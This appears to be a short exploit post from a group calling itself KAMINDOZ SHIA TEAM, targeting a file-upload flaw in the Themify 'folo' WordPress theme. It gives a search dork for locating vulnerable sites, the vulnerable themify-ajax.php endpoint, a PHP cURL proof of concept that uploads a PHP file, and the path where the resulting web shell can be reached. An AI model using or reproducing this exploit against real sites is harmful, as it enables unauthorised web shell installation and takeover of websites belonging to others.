KAMINDOZ SHIA TEAM
#Vendor : http://themify.me/
#Download : http://themify.me/themes/folo
#Date : 22, November 2013.
#Type : php, html, htm, asp, etc.
#Category : Web Applications
#Vulnerability : File Upload
#Tested On : Windows 7 32-bit | Google Chrome
#Dork : inurl:/wp-content/themes/folo/
#Exploit : http://victim/%5BPATH%5D/wp-content/themes/folo/themify/themify-ajax.php
#POC :
$uploadfile=”ReC0ded.php”;
$ch = curl_init(“http://victim/%5BPATH%5D/wp-content/themes/folo/themify/themify-ajax.php?upload=1″);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array(‘Filedata’=>”@$uploadfile”));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
?>
#Results See Your Shell On : http://victim/%5BPATH%5D/wp-content/themes/folo/uploads/{YOUR_FILE}.php
| روابط هذه التدوينة قابلة للنسخ واللصق | |
| URL | |
| HTML | |
| BBCode | |
kamindoz
